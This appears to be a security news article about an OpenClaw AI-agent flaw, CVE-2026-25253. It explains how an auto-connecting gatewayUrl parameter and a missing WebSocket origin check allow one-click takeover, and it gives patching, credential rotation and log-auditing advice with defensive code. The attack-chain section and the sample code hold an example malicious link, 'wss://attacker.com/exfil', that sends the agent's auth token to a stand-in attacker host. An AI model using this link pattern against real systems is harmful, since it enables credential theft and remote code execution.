One Click, Full Compromise: Critical OpenClaw Flaw Exposes 135,000 AI Agents to Remote Takeover

CVE-2026-25253 lets attackers hijack OpenClaw AI agents with a single malicious link. Over 135,000 instances are exposed online, many still unpatched.

A critical vulnerability in OpenClaw, the viral open-source AI agent with 145,000 GitHub stars, allows attackers to take full control of a user’s system with a single malicious link. Over 135,000 instances are exposed to the internet. Proof-of-concept exploits are already public.

CVE-2026-25253 carries a CVSS score of 8.8 (High). It requires no authentication. The patch has been available since January 30, but scan data shows thousands of instances remain unpatched. Belgium’s Centre for Cybersecurity issued a national advisory urging immediate patching.

What OpenClaw Does - And Why That Matters

OpenClaw (formerly Clawdbot, then Moltbot) is an autonomous AI personal assistant that runs locally on user devices. It connects large language models to your local files, messaging apps (WhatsApp, Telegram, Slack, Discord, Signal, iMessage), browser sessions, and over 100 preconfigured “AgentSkills” that can execute shell commands, manage filesystems, and automate web interactions.

That’s a lot of power. When the tool works as intended, it automates digital tasks across your entire stack. When an attacker controls it, they get the same access. Every credential, every file, every messaging platform the agent is connected to.

The project exploded from 9,000 to over 60,000 GitHub stars in just days. Companies across Silicon Valley and China adopted it. That growth outpaced any serious security review.

How the Attack Works

The vulnerability is a logic flaw in how OpenClaw handles URL parameters. OpenClaw’s Control UI accepts a gatewayUrl query parameter and automatically initiates a WebSocket connection to that URL - without asking the user.
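The vulnerable pattern can be sketched in a few lines. This is an illustration of the class of flaw, not OpenClaw's actual code; the function name and page URL are invented for the example:

```python
from urllib.parse import parse_qs, urlparse

# Hedged sketch of the vulnerable pattern (not OpenClaw's real code):
# a control UI that reads a gateway URL straight from the query string
# and connects to it with no confirmation and no origin restriction.
def gateway_from_query(page_url: str):
    """Extract the gatewayUrl query parameter, if present."""
    params = parse_qs(urlparse(page_url).query)
    values = params.get("gatewayUrl")
    return values[0] if values else None

url = "https://victim.local/control?gatewayUrl=wss://attacker.com/exfil"
target = gateway_from_query(url)
# target == "wss://attacker.com/exfil" - a vulnerable UI would open a
# WebSocket here automatically, leaking the auth token in the handshake.
```

Anything user-controlled that decides where a client connects needs either an allowlist or an explicit confirmation step before the connection is made.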

The attack chain works in six steps:

  1. Delivery. Attacker sends a link: ?gatewayUrl=wss://attacker.com/exfil
  2. Connection. Victim’s browser automatically opens a WebSocket to the attacker’s server
  3. Exfiltration. OpenClaw’s authentication token is transmitted during the WebSocket handshake - no user interaction needed
  4. Access. Attacker uses the stolen token to connect to the victim’s local OpenClaw gateway
  5. Reconfiguration. Attacker disables sandbox policies and enables dangerous tools
  6. Execution. Privileged API calls achieve remote code execution on the host

The critical detail: OpenClaw’s server doesn’t validate the WebSocket origin header. It accepts connections from any website. This means the victim’s own browser acts as a bridge, bypassing firewalls and NAT restrictions to reach services bound to localhost. Even if you never exposed OpenClaw to the internet, you’re still vulnerable if you click the wrong link while it’s running.
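The missing check is a standard one. A minimal sketch of Origin validation for WebSocket upgrades follows - the allowlist entries and function name are assumptions for illustration, not OpenClaw's API:

```python
from typing import Optional
from urllib.parse import urlparse

# Hypothetical allowlist: only the local Control UI origins are trusted.
ALLOWED_ORIGINS = {"http://127.0.0.1:18789", "http://localhost:18789"}

def is_allowed_origin(origin_header: Optional[str]) -> bool:
    """Reject WebSocket upgrades whose Origin is not explicitly allowlisted.

    Browsers send the Origin header on cross-site WebSocket requests, so a
    foreign Origin indicates the connection was initiated by another site.
    """
    if not origin_header:
        return False  # fail closed: no Origin, no upgrade
    if urlparse(origin_header).scheme not in ("http", "https"):
        return False
    return origin_header in ALLOWED_ORIGINS
```

With this check in place, a page at attacker.com opening a WebSocket to 127.0.0.1:18789 arrives with Origin "https://attacker.com" and is refused before the handshake completes.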

Security researcher depthfirst discovered and reported the vulnerability; proof-of-concept code was published after the January 26, 2026 disclosure.

135,000 Instances, Wide Open

The exposure numbers paint a grim picture. Bitdefender found over 135,000 internet-facing OpenClaw instances, many originating from corporate IP space rather than hobby deployments. Separately, Security Boulevard identified 42,900 exposed control panels. Tens of thousands are linked to previously breached infrastructure or known malicious IP addresses.

This exposure isn’t accidental. OpenClaw binds by default to 0.0.0.0:18789 - listening on all interfaces unless an operator explicitly restricts it. A secure-by-default design would bind to 127.0.0.1. OpenClaw doesn’t.
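You can verify your own bind configuration with a quick TCP probe. A minimal sketch, assuming the default port 18789 noted above - adjust for your deployment:

```python
import socket

def is_listening(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

# After restricting the bind to 127.0.0.1, the loopback probe should
# succeed while a probe against your machine's LAN address should not:
#   is_listening("127.0.0.1", 18789)   -> True if the agent is running
#   is_listening("192.0.2.10", 18789)  -> False (example LAN address)
```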

So you have an autonomous AI agent with shell access, file access, and messaging platform credentials, bound to all network interfaces, with a one-click remote takeover vulnerability. That’s not a bug report - that’s a breach waiting to happen.

The AI Agent Security Problem

This follows a pattern. Two days ago, we covered three GitHub Copilot command injection flaws affecting every major IDE. Last week, DockerDash showed how Docker’s AI assistant could be hijacked through metadata injection. The Bondu AI toy exposed 50,000 children’s conversations through a misconfigured console.

The common thread: AI tools are being shipped with broad system access and inadequate security boundaries. These aren’t novel attack techniques. Missing origin validation on WebSockets, unsanitized URL parameters, default-open network bindings - these are basic security failures that have been well-documented for over a decade. The difference is that the blast radius of each failure is now vastly larger because the compromised tool has autonomous access to everything on the machine.

OpenClaw connects to your shell, your files, your messaging apps, and your cloud credentials. Copilot runs in your IDE with access to your codebase and development environment. Docker’s AI assistant manages your container infrastructure. When these tools are compromised, attackers don’t just get a foothold - they get the keys to the entire operation.

What You Should Do

If you run OpenClaw, patch now. Update to version 2026.1.29 or later. The fix adds a gateway URL confirmation modal that requires explicit user approval before connecting to new gateway URLs.
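The logic of that fix amounts to a confirmation gate in front of every unrecognized gateway URL. A hedged sketch of the idea - the names and the approval-callback shape are illustrative, not OpenClaw's actual implementation:

```python
# Hypothetical sketch of the patched behavior: connect only to known
# gateways, or after explicit user approval (the confirmation modal).
APPROVED_GATEWAYS = {"ws://127.0.0.1:18789"}

def should_connect(gateway_url: str, user_approves) -> bool:
    """Gate gateway connections behind an allowlist plus explicit approval."""
    if gateway_url in APPROVED_GATEWAYS:
        return True
    if user_approves(gateway_url):  # e.g. the user clicks "Connect" in a modal
        APPROVED_GATEWAYS.add(gateway_url)
        return True
    return False
```

The key property is that a link alone can no longer trigger the connection; a deliberate user action is required for anything off the allowlist.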

Rotate everything. After updating, generate a new authToken for all OpenClaw instances. Then rotate API keys for every connected service - Slack, Discord, Telegram, AWS, GCP, Azure, and anything else your agent touches. If you were compromised before patching, the attacker already has those credentials.

Audit your logs. Look for unexpected WebSocket connections to external domains and sudden gateway configuration changes since January 26, 2026 - when the proof-of-concept was first disclosed.
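A log sweep for off-host gateway URLs can be scripted in a few lines. This sketch assumes plain-text logs containing ws:// or wss:// URLs; OpenClaw's actual log schema may differ, and the trusted-host list is an assumption:

```python
import re
from urllib.parse import urlparse

TRUSTED_HOSTS = {"127.0.0.1", "localhost"}
WS_URL = re.compile(r"wss?://[^\s\"']+")

def suspicious_gateways(log_lines):
    """Yield (line, url) pairs where a ws:// or wss:// URL points off-host."""
    for line in log_lines:
        for url in WS_URL.findall(line):
            host = urlparse(url).hostname
            if host and host not in TRUSTED_HOSTS:
                yield line, url

# Illustrative log lines, not OpenClaw's real format:
logs = [
    "2026-01-27T10:01:02 gateway connect wss://attacker.example/exfil",
    "2026-01-27T10:05:00 gateway connect ws://127.0.0.1:18789",
]
hits = list(suspicious_gateways(logs))
# hits flags only the first line (attacker.example is not a trusted host)
```

Any hit dated after January 26, 2026 deserves the full credential-rotation treatment described above.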

Lock down the network binding. Change OpenClaw’s binding from 0.0.0.0 to 127.0.0.1. If you need remote access, put it behind a VPN or authenticated reverse proxy. There’s no reason an autonomous AI agent should be listening on a public interface.

Question your AI agent architecture. If an AI tool has shell access, file access, and network access, treat it like a privileged service. Apply the same security controls you’d apply to a database server or CI/CD runner: network isolation, minimal permissions, monitored access, and regular security audits. The convenience of an all-access AI assistant isn’t worth the exposure when a single click can hand everything over.